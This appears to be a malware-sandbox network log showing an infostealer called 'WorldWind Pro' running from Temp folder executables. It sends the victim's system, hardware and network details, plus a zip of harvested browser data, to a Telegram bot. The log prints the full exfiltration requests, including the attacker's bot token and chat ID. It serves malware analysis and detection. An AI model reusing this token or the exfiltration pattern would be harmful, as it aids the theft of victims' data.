                                                                                                                                                                                                                                2024-07-06 11:28:39 UTC83OUTGET /s/n41axwfwvc7fb8d/image.png?dl=1 HTTP/1.1
                                                                                                                                                                                                                                Host: dl.dropboxusercontent.com
                                                                                                                                                                                                                                2024-07-06 11:28:40 UTC441INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                Content-Security-Policy: sandbox allow-forms allow-scripts
                                                                                                                                                                                                                                Date: Sat, 06 Jul 2024 11:28:40 GMT
                                                                                                                                                                                                                                Server: envoy
                                                                                                                                                                                                                                Content-Length: 925
                                                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                X-Robots-Tag: noindex, nofollow, noimageindex
                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                X-Dropbox-Response-Origin: far_remote
                                                                                                                                                                                                                                X-Dropbox-Request-Id: d3386346e32345819c3a4031911030dc
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                2024-07-06 11:28:40 UTC925INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 44 72 6f 70 62 6f 78 20 2d 20 34 30 33 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 66 6c 2e 64 72 6f 70 62 6f 78 73 74 61 74 69 63 2e 63 6f 6d 2f 73 74 61 74 69 63 2f 6d 65 74 61 73 65 72 76 65
                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE html><html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Dropbox - 403</title><link href="https://cfl.dropboxstatic.com/static/metaserve


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                37192.168.2.449887149.154.167.2204435720C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-07-06 11:28:41 UTC1720OUTGET /bot6082381502:AAEEe5dVvSMdEf-_fKUh7iRqcNun3Q5DzxM/sendMessage?chat_id=5795480469&text=%0A%20%20%F0%9F%8C%AA%20*WorldWind%20Pro%20-%20Results:*%0ADate:%202024-07-06%207:27:22%20am%0ASystem:%20Windows%2010%20Pro%20(64%20Bit)%0AUsername:%20user%0ACompName:%20134349%0ALanguage:%20%F0%9F%87%A8%F0%9F%87%AD%20en-CH%0AAntivirus:%20Windows%20Defender.%0A%0A%20%20%F0%9F%92%BB%20*Hardware:*%0ACPU:%20Intel(R)%20Core(TM)2%20CPU%206600%20@%202.40%20GHz%0AGPU:%201BUBDD%0ARAM:%204095MB%0AHWID:%209C8FCB6779%0APower:%20NoSystemBattery%20(1%25)%0AScreen:%201280x1024%0A%0A%20%20%F0%9F%93%A1%20*Network:*%20%0AGateway%20IP:%20192.168.2.1%0AInternal%20IP:%20No%20network%20adapters%20with%20an%20IPv4%20address%20in%20the%20system!%0AExternal%20IP:%208.46.123.33%0ABSSID:%2000:50:56:a7:21:15%0A%0A%20%20%F0%9F%92%B8%20*Domains%20info:*%0A%20%20%20%E2%88%9F%20%F0%9F%8F%A6%20*Bank%20Logs*%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%92%B0%20*Crypto%20Logs*%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%8D%93%20*Freaky%20Logs*%20(No%20d [TRUNCATED]
                                                                                                                                                                                                                                Host: api.telegram.org
                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                2024-07-06 11:28:41 UTC347INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                Server: nginx/1.18.0
                                                                                                                                                                                                                                Date: Sat, 06 Jul 2024 11:28:41 GMT
                                                                                                                                                                                                                                Content-Type: application/json
                                                                                                                                                                                                                                Content-Length: 137
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                                                                                                                2024-07-06 11:28:41 UTC137INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 30 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 42 61 64 20 52 65 71 75 65 73 74 3a 20 63 61 6e 27 74 20 70 61 72 73 65 20 65 6e 74 69 74 69 65 73 3a 20 43 61 6e 27 74 20 66 69 6e 64 20 65 6e 64 20 6f 66 20 74 68 65 20 65 6e 74 69 74 79 20 73 74 61 72 74 69 6e 67 20 61 74 20 62 79 74 65 20 6f 66 66 73 65 74 20 39 31 35 22 7d
                                                                                                                                                                                                                                Data Ascii: {"ok":false,"error_code":400,"description":"Bad Request: can't parse entities: Can't find end of the entity starting at byte offset 915"}


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                38192.168.2.449888149.154.167.2204435720C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-07-06 11:28:41 UTC171OUTGET /bot6082381502:AAEEe5dVvSMdEf-_fKUh7iRqcNun3Q5DzxM/sendMessage?chat_id=5795480469&text=%F0%9F%93%81%20Uploading%20Log%20Folders... HTTP/1.1
                                                                                                                                                                                                                                Host: api.telegram.org
                                                                                                                                                                                                                                2024-07-06 11:28:42 UTC388INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Server: nginx/1.18.0
                                                                                                                                                                                                                                Date: Sat, 06 Jul 2024 11:28:42 GMT
                                                                                                                                                                                                                                Content-Type: application/json
                                                                                                                                                                                                                                Content-Length: 297
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                                                                                                                2024-07-06 11:28:42 UTC297INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 32 36 33 31 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 32 33 38 31 35 30 32 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 44 69 61 6d 6f 74 72 69 78 42 6f 74 73 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 44 69 61 6d 6f 74 72 69 78 42 6f 74 73 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 35 37 39 35 34 38 30 34 36 39 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 44 69 61 6d 6f 74 72 69 78 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 44 69 61 6d 6f 74 72 69 78 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 32 30 32 36 35 33 32 32 2c 22 74 65 78 74 22
                                                                                                                                                                                                                                Data Ascii: {"ok":true,"result":{"message_id":26314,"from":{"id":6082381502,"is_bot":true,"first_name":"DiamotrixBotss","username":"DiamotrixBotss_bot"},"chat":{"id":5795480469,"first_name":"Diamotrix","username":"Diamotrix","type":"private"},"date":1720265322,"text"


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                39192.168.2.449891172.67.196.114443420C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-07-06 11:28:43 UTC112OUTGET /geolocation/wifi?v=1.1&bssid=00:50:56:a7:21:15 HTTP/1.1
                                                                                                                                                                                                                                Host: api.mylnikov.org
                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                2024-07-06 11:28:43 UTC784INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Sat, 06 Jul 2024 11:28:43 GMT
                                                                                                                                                                                                                                Content-Type: application/json; charset=utf8
                                                                                                                                                                                                                                Content-Length: 88
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                Cache-Control: max-age=2678400
                                                                                                                                                                                                                                CF-Cache-Status: HIT
                                                                                                                                                                                                                                Age: 3
                                                                                                                                                                                                                                Last-Modified: Sat, 06 Jul 2024 11:28:40 GMT
                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EpAwUFQmWr0WrplmPANU88fpalGuCfhERd46MJO5KmvZQLx3BHWLjfYl6pUHOwhGu4UZCGxRs2DPGiNWkFl7xv5ezYic64vJ71vz9cetdMstRdZVEDjig%2Foy0qBGFL%2B8S8zR"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                Strict-Transport-Security: max-age=0; preload
                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                CF-RAY: 89ef40c04c7372a7-EWR
                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                2024-07-06 11:28:43 UTC88INData Raw: 7b 22 72 65 73 75 6c 74 22 3a 34 30 34 2c 20 22 64 61 74 61 22 3a 7b 7d 2c 20 22 6d 65 73 73 61 67 65 22 3a 36 2c 20 22 64 65 73 63 22 3a 22 4f 62 6a 65 63 74 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 22 2c 20 22 74 69 6d 65 22 3a 31 37 32 30 32 36 35 33 32 30 7d
                                                                                                                                                                                                                                Data Ascii: {"result":404, "data":{}, "message":6, "desc":"Object was not found", "time":1720265320}


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                40192.168.2.449890149.154.167.2204435720C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-07-06 11:28:44 UTC254OUTPOST /bot6082381502:AAEEe5dVvSMdEf-_fKUh7iRqcNun3Q5DzxM/sendDocument?chat_id=5795480469 HTTP/1.1
                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary="4218323f-0b5f-4f02-ae6c-04af12749150"
                                                                                                                                                                                                                                Host: api.telegram.org
                                                                                                                                                                                                                                Content-Length: 142488
                                                                                                                                                                                                                                Expect: 100-continue
                                                                                                                                                                                                                                2024-07-06 11:28:44 UTC25INHTTP/1.1 100 Continue
                                                                                                                                                                                                                                2024-07-06 11:28:44 UTC40OUTData Raw: 2d 2d 34 32 31 38 33 32 33 66 2d 30 62 35 66 2d 34 66 30 32 2d 61 65 36 63 2d 30 34 61 66 31 32 37 34 39 31 35 30 0d 0a
                                                                                                                                                                                                                                Data Ascii: --4218323f-0b5f-4f02-ae6c-04af12749150
                                                                                                                                                                                                                                2024-07-06 11:28:44 UTC265OUTData Raw: 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 64 6f 63 75 6d 65 6e 74 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 43 3a 5c 55 73 65 72 73 5c 6a 6f 6e 65 73 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 33 66 39 65 30 37 33 65 37 36 34 30 35 33 35 63 61 33 31 61 30 39 66 65 64 34 65 33 39 66 35 35 5c 6a 6f 6e 65 73 40 31 33 34 33 34 39 5f 65 6e 2d 43 48 2e 7a 69 70 22 3b 20 66 69 6c 65 6e 61 6d 65 2a 3d 75 74 66 2d 38 27 27 43 25 33 41 25 35 43 55 73 65 72 73 25 35 43 6a 6f 6e 65 73 25 35 43 41 70 70 44 61 74 61 25 35 43 4c 6f 63 61 6c 25 35 43 33 66 39 65 30 37 33 65 37 36 34 30 35 33 35 63 61 33 31 61 30 39 66 65 64 34 65 33 39 66 35 35 25 35 43 6a 6f 6e 65 73 25 34 30 31 33 34 33 34 39 5f 65 6e 2d
                                                                                                                                                                                                                                Data Ascii: Content-Disposition: form-data; name=document; filename="C:\Users\user\AppData\Local\3f9e073e7640535ca31a09fed4e39f55\user@134349_en-CH.zip"; filename*=utf-8''C%3A%5CUsers%5Cuser%5CAppData%5CLocal%5C3f9e073e7640535ca31a09fed4e39f55%5Cuser%40134349_en-
                                                                                                                                                                                                                                2024-07-06 11:28:44 UTC16355OUTData Raw: 50 4b 03 04 14 00 00 00 00 00 05 51 e6 58 00 00 00 00 00 00 00 00 00 00 00 00 0e 00 00 00 42 72 6f 77 73 65 72 73 5c 45 64 67 65 5c 50 4b 03 04 14 00 00 00 08 00 6f 3b e6 58 51 33 92 06 4a 00 00 00 69 00 00 00 1e 00 00 00 42 72 6f 77 73 65 72 73 5c 46 69 72 65 66 6f 78 5c 42 6f 6f 6b 6d 61 72 6b 73 2e 74 78 74 53 56 56 56 70 4f 2d 51 f0 48 cd 29 50 50 56 56 e6 02 62 05 e7 d2 e2 92 fc dc cc aa 54 05 b7 cc a2 d4 b4 fc 0a b8 0c 48 a9 67 5e 59 7e 4e 59 6a 0a 5c d0 31 29 bf b4 44 21 b4 18 59 55 49 66 5e ba 42 70 49 62 51 09 54 21 00 50 4b 03 04 14 00 00 00 08 00 6f 3b e6 58 63 c2 65 e7 53 00 00 00 5e 00 00 00 1c 00 00 00 42 72 6f 77 73 65 72 73 5c 46 69 72 65 66 6f 78 5c 48 69 73 74 6f 72 79 2e 74 78 74 53 56 56 56 70 cb 2c 4a 4d cb af 50 08 28 ca 2c 4b 4c ae
                                                                                                                                                                                                                                Data Ascii: PKQXBrowsers\Edge\PKo;XQ3JiBrowsers\Firefox\Bookmarks.txtSVVVpO-QH)PPVVbTHg^Y~NYj\1)D!YUIf^BpIbQT!PKo;XceS^Browsers\Firefox\History.txtSVVVp,JMP(,KL
                                                                                                                                                                                                                                2024-07-06 11:28:44 UTC16355OUTData Raw: 16 6b 8c fb a2 b5 30 b0 df 12 5f c0 a2 aa 67 3d 99 eb a5 b3 56 c8 86 b6 9e 01 fb 0c dd 62 6a a3 34 e7 7c 08 bb 60 1d af 40 f8 2b be fa eb c0 0f eb f0 74 e3 f3 2c de 19 f5 48 7e d6 f4 21 06 57 8c 2a aa 87 58 c6 05 8f 52 af 4c e7 46 b4 5f c0 42 a9 da 35 77 8b 46 18 e7 f5 91 6b 98 06 f7 bd 70 52 90 5e af d3 a4 78 a8 7d 4d 70 45 1b 51 80 6f 45 1a 6f 3b 45 ab d3 f7 f3 ab 7d 58 46 27 ff c9 be 19 16 2c 13 ea 11 5b c8 09 05 3b 52 87 5a 6e ba 69 c6 0e 29 e9 e7 4d 6c a7 76 84 d5 da 43 7c bd 0c b9 e7 f3 08 57 fa 6d 3c 2a 96 18 8f 7b f3 e4 08 84 98 ce 87 9b b1 ba d3 5e d3 b8 98 0a 82 db b9 d4 a7 82 2d 15 05 ce 14 ce 7d ba 3b 93 93 58 df fd d0 eb 51 82 e7 54 de d9 4b e2 6f 13 98 ba 4a cb df da 4a 7b e1 ea 07 5f 3b ad fa fd fd 03 50 4b 03 04 14 00 00 00 08 00 51 40 44
                                                                                                                                                                                                                                Data Ascii: k0_g=Vbj4|`@+t,H~!W*XRLF_B5wFkpR^x}MpEQoEo;E}XF',[;RZni)MlvC|Wm<*{^-};XQTKoJJ{_;PKQ@D
                                                                                                                                                                                                                                2024-07-06 11:28:44 UTC16355OUTData Raw: 66 7f 6e 3d 2a b4 0a 18 a0 12 53 87 e9 6d af fe 78 d6 dc 68 89 d6 ae 2a 10 a2 7c 5c b1 58 c9 cf 05 7d 9b e1 f2 a7 ac 86 ba 24 0b dc 74 cd b0 e0 d9 2e c7 f5 22 7f 75 04 f2 3b cb 38 25 ec be b0 63 d8 ab 0d 79 fa 30 35 e5 34 ce 9b e7 cc da 5f b8 da 59 2b 51 c9 16 6f 99 58 cf c7 1f 35 ab d0 a5 31 fd ed 89 94 2e 3d 4c 51 c5 98 c5 74 52 7e df 67 18 6b 8b 28 3f fc c1 e0 2c 9e 3a fd 7a a7 d6 e6 3c 74 33 dd ad 9c 73 e5 1d dc a5 77 db 37 14 63 ab 83 6c 2a d5 31 a5 a1 95 20 af 58 b3 75 f1 36 f3 45 9f e2 cd f8 91 ac 76 6e 78 f2 fa 04 ea d9 64 f7 1f 2c 6a 24 c1 22 96 c9 fc 61 e8 31 de f7 33 cd 28 7d 79 9a ef cc 6e 24 55 7a 54 0f 34 44 a8 bf 3f 7f 50 4b 03 04 14 00 00 00 08 00 51 40 44 57 59 f1 45 0f 84 02 00 00 02 04 00 00 34 00 00 00 47 72 61 62 62 65 72 5c 44 52 49
                                                                                                                                                                                                                                Data Ascii: fn=*Smxh*|\X}$t."u;8%cy054_Y+QoX51.=LQtR~gk(?,:z<t3sw7cl*1 Xu6Evnxd,j$"a13(}yn$UzT4D?PKQ@DWYE4Grabber\DRI
                                                                                                                                                                                                                                2024-07-06 11:28:44 UTC16355OUTData Raw: df a0 9e 19 75 da f7 45 ee e5 34 b2 7b 28 ab 4b bc 52 af dc e2 67 6d 47 d5 5c 6f 68 c9 65 4d 6d 38 44 34 46 6a 9b ef 2e 79 7f 5e 29 d9 6d ab 2f d0 c3 99 62 6d 8c 2d d4 ee c5 ab 8f 80 bf 11 30 ae be eb f5 95 a3 28 e3 c8 bb 2b 87 c6 0b 5d f6 c2 91 ed d2 55 1c 57 4f 6b 71 99 c1 56 13 43 30 67 50 af a7 97 7e a7 b7 a9 dd 1c e6 1e 37 03 56 3b a1 49 c7 3c ae b5 7b 16 5d 9f ba dc 12 68 56 2b 1f be 8b bd 94 f5 da 75 c9 d2 53 6f f9 50 1b 1f eb 13 db 43 6e 8f 53 e3 cf 45 a0 80 c2 2e e5 dd 69 3e 9b 85 3a f3 41 83 36 94 7b 8c 31 9c 94 36 70 aa fc fb 22 32 f4 ca a9 9e 0b 2f 91 d1 cf 6b de ab 70 3f 49 6a 44 28 3e 31 aa 05 7d 9d b8 e3 1c fa f7 e7 0f 50 4b 03 04 14 00 00 00 08 00 51 40 44 57 50 ad d3 d6 82 02 00 00 02 04 00 00 35 00 00 00 47 72 61 62 62 65 72 5c 44 52 49
                                                                                                                                                                                                                                Data Ascii: uE4{(KRgmG\oheMm8D4Fj.y^)m/bm-0(+]UWOkqVC0gP~7V;I<{]hV+uSoPCnSE.i>:A6{16p"2/kp?IjD(>1}PKQ@DWP5Grabber\DRI
                                                                                                                                                                                                                                2024-07-06 11:28:44 UTC16355OUTData Raw: 8a 7c 36 97 e0 11 2c 3f 2e 7a b9 d3 67 f5 b8 b1 fb 6d d6 b7 6f aa c2 26 f9 78 85 e2 3f dc 65 1a 3f 3e b3 68 98 40 00 76 82 ac b7 2e ee f9 0b 48 bb 84 fc a6 6e 7c a3 ff f4 75 90 dd ad 2f 2d ea 46 02 1d 57 0a a1 f0 40 e2 81 20 00 91 41 9f f7 a8 40 c7 66 99 2b 39 7a dc e7 04 6f 42 27 cc fb 47 26 55 e2 f1 91 39 93 30 d0 e3 39 e9 62 77 18 08 80 82 78 ef 6c d3 b2 4d 5f 33 cb 5b 19 e3 26 46 5d cb a8 e2 1f 34 4b 85 6a d2 2b 5a 9f 97 55 7a cc 2c 7f 06 a5 c2 17 ad 09 40 9a 6a 4c 5b db 99 33 56 fe 14 b5 61 6a bc dc e1 ce de b3 9e 63 e9 5d 96 65 5e 2e b2 f1 91 6c 3c 02 74 45 a2 17 2e e8 5f 2a 97 dc 54 3b 9b f8 fb 7b b1 18 9d f4 ec 99 cf 2f 5f 36 8d ae 78 50 88 88 59 7f b1 28 14 51 b2 a6 70 49 1e f6 ea 55 33 be a6 8b 1f 5f d8 10 fc f3 72 0f 31 57 f0 87 6a 2f 48 20 2c
                                                                                                                                                                                                                                Data Ascii: |6,?.zgmo&x?e?>h@v.Hn|u/-FW@ A@f+9zoB'G&U909bwxlM_3[&F]4Kj+ZUz,@jL[3Vajc]e^.l<tE._*T;{/_6xPY(QpIU3_r1Wj/H ,
                                                                                                                                                                                                                                2024-07-06 11:28:44 UTC16355OUTData Raw: e0 ce c6 3b 87 87 3a 7e 5d 17 21 75 e8 49 1a 71 1a 8f 94 5d a5 04 c9 93 3f 49 f2 62 83 2f c3 e9 6e a6 41 a5 6c 39 aa f0 f5 f0 cf 3a 09 0e 35 de 73 f6 f1 47 46 17 89 c2 16 c4 93 f8 a1 0b 6f ad e3 9f 26 61 9d e4 d0 67 c9 b4 80 c2 6c 2d ba 5a e6 6d 62 2c 15 70 86 0b 78 9a 17 4b 8e 8b 95 b3 2a d6 bf 94 29 84 4b 69 85 0d b8 8e 3e 8b e4 fa c6 59 a5 6c e6 42 2e 35 bd 0d cc 1e 2b 8b 35 8e 68 6e ad dc 63 a8 bb c1 69 0e eb a1 03 c7 c4 46 88 21 26 e3 7c 97 66 84 b5 46 d7 b3 74 c2 9f 76 5b b4 ce 4f c9 28 95 2a 0d bb 78 7f 0b 08 bb 05 9c 14 88 10 65 55 85 03 9f e0 bf df 50 1a 8b 51 64 ce 80 b0 b9 6b c8 1f 0b cb c6 43 41 52 42 09 22 75 e6 16 21 76 14 87 7b bf 6b e7 87 9c cc 4d 99 6a f1 7c f8 b1 d3 66 37 7d 0b 08 51 cf a8 5d 9f cf 55 8a 13 e6 9b b8 2c 8b 2c e2 69 30 3b
                                                                                                                                                                                                                                Data Ascii: ;:~]!uIq]?Ib/nAl9:5sGFo&agl-Zmb,pxK*)Ki>YlB.5+5hnciF!&|fFtv[O(*xeUPQdkCARB"u!v{kMj|f7}Q]U,,i0;
                                                                                                                                                                                                                                2024-07-06 11:28:44 UTC16355OUTData Raw: 95 de 41 aa d2 7b ef 25 39 3b 09 f8 fa fe be 6f 9c 73 ef 1d f7 9e f3 cf 1d 83 30 b2 b3 77 d6 da d9 6b cd 39 9f 39 d7 5c f3 d9 25 f8 bc a8 eb a8 06 b9 fd 33 ff fd 96 4e 10 b5 3e ae 8a d0 a1 96 57 2a 32 d5 7b 1c 19 58 b6 5c 4a fb 74 bd d0 2c 9e d7 05 1f 5a 47 43 49 fb d5 e4 3e 5e 41 d6 8c fe ce 68 74 a5 8a 1e 6e 64 60 86 fa 7b bd a6 9c c5 cb 10 a6 9a a7 65 fe 1d 5a 24 7c a3 b8 22 9e 56 0a df cb 71 47 a4 a2 5b a5 2a 2b 19 f9 7e 7c f2 ec 5f f3 6f d7 fe d2 67 6d f4 fd 5b 8f 79 fb f4 86 2c 3e 8c ce 06 07 32 1d fa b5 e6 5d ce 4b be 67 34 f8 c9 72 15 dc bb 88 94 e2 03 8f c2 12 6f ef 60 af d2 f6 7b ac 4a 5b 2e 22 26 f0 94 2a c0 11 b0 64 3d de fd 84 02 d5 d6 20 1b 0b ab 21 28 d0 4d 01 14 28 9f f1 a0 d4 7c b5 06 39 9b 87 02 c1 4b 93 26 55 0e 2e 64 9d d8 31 b4 7f 14
                                                                                                                                                                                                                                Data Ascii: A{%9;os0wk99\%3N>W*2{X\Jt,ZGCI>^Ahtnd`{eZ$|"VqG[*+~|_ogm[y,>2]Kg4ro`{J[."&*d= !(M(|9K&U.d1
                                                                                                                                                                                                                                2024-07-06 11:28:44 UTC16355OUTData Raw: ba bd f6 fc 64 5c d8 2e de 79 60 3c e5 4d 95 d1 61 cf c4 dc 1e 7d 02 d8 6d 65 e6 2b e2 5c 8d 9d 2d ad d5 84 55 e8 ec 4f c7 32 08 ab 87 51 31 81 12 d2 ea 49 63 93 b8 cd 14 3b 8f 6b 93 88 65 cd b0 ad c9 86 61 02 dd 96 55 e1 44 7b 6e 5b 2c 31 a3 7c 59 18 28 d4 f4 92 24 32 37 24 95 ec 47 87 e4 58 fb ed a5 4d e4 bb e1 22 64 4d fe eb 0c 35 43 85 ec 6f 05 df 7e 79 de a2 0a ad 16 64 cf 1d 9f d5 83 0f 16 b7 f0 e0 b2 3d 82 c9 de 5a ee 54 7d 72 80 a3 1e cd 1c 62 b9 48 49 33 53 7f 58 ba 39 66 65 d7 79 fd 04 ae db 44 52 c4 65 c2 f2 88 d2 e4 d2 cb 5c 71 0b fe 70 a9 70 b9 61 7b 8b 11 3d 6f 83 9a 02 6e 49 44 b7 65 54 7c 69 94 7b b5 ae 5a c4 f0 ae 5c 5b 9a 40 d0 10 87 c3 16 3f 48 0a 57 12 cf 8e fa 86 6f a2 16 bd 2f a3 05 4d 59 46 ba 7e fb cb ae 2f ab 02 6b a5 d5 c5 fc ac
                                                                                                                                                                                                                                Data Ascii: d\.y`<Ma}me+\-UO2Q1Ic;keaUD{n[,1|Y($27$GXM"dM5Co~yd=ZT}rbHI3SX9feyDRe\qppa{=onIDeT|i{Z\[@?HWo/MYF~/k
                                                                                                                                                                                                                                2024-07-06 11:28:44 UTC902INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Server: nginx/1.18.0
                                                                                                                                                                                                                                Date: Sat, 06 Jul 2024 11:28:44 GMT
                                                                                                                                                                                                                                Content-Type: application/json
                                                                                                                                                                                                                                Content-Length: 514
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                                                                                                                {"ok":true,"result":{"message_id":26315,"from":{"id":6082381502,"is_bot":true,"first_name":"DiamotrixBotss","username":"DiamotrixBotss_bot"},"chat":{"id":5795480469,"first_name":"Diamotrix","username":"Diamotrix","type":"private"},"date":1720265324,"document":{"file_name":"C_UsersuserAppDataLocal3f9e073e7640535ca31a09fed4e39f55user@13.zip","mime_type":"application/zip","file_id":"BQACAgQAAxkDAAJmy2aJKmxPtZ9nDox_DXkTCZO5YzgTAAIfFQACgL9JUFhnsdejxsvtNQQ","file_unique_id":"AgADHxUAAoC_SVA","file_size":142139}}}


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                41192.168.2.449892149.154.167.220443420C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-07-06 11:28:44 UTC1720OUTGET /bot6082381502:AAEEe5dVvSMdEf-_fKUh7iRqcNun3Q5DzxM/sendMessage?chat_id=5795480469&text=%0A%20%20%F0%9F%8C%AA%20*WorldWind%20Pro%20-%20Results:*%0ADate:%202024-07-06%207:27:25%20am%0ASystem:%20Windows%2010%20Pro%20(64%20Bit)%0AUsername:%20user%0ACompName:%20134349%0ALanguage:%20%F0%9F%87%A8%F0%9F%87%AD%20en-CH%0AAntivirus:%20Windows%20Defender.%0A%0A%20%20%F0%9F%92%BB%20*Hardware:*%0ACPU:%20Intel(R)%20Core(TM)2%20CPU%206600%20@%202.40%20GHz%0AGPU:%201BUBDD%0ARAM:%204095MB%0AHWID:%209C8FCB6779%0APower:%20NoSystemBattery%20(1%25)%0AScreen:%201280x1024%0A%0A%20%20%F0%9F%93%A1%20*Network:*%20%0AGateway%20IP:%20192.168.2.1%0AInternal%20IP:%20No%20network%20adapters%20with%20an%20IPv4%20address%20in%20the%20system!%0AExternal%20IP:%208.46.123.33%0ABSSID:%2000:50:56:a7:21:15%0A%0A%20%20%F0%9F%92%B8%20*Domains%20info:*%0A%20%20%20%E2%88%9F%20%F0%9F%8F%A6%20*Bank%20Logs*%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%92%B0%20*Crypto%20Logs*%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%8D%93%20*Freaky%20Logs*%20(No%20d [TRUNCATED]
                                                                                                                                                                                                                                Host: api.telegram.org
                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                2024-07-06 11:28:44 UTC347INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                Server: nginx/1.18.0
                                                                                                                                                                                                                                Date: Sat, 06 Jul 2024 11:28:44 GMT
                                                                                                                                                                                                                                Content-Type: application/json
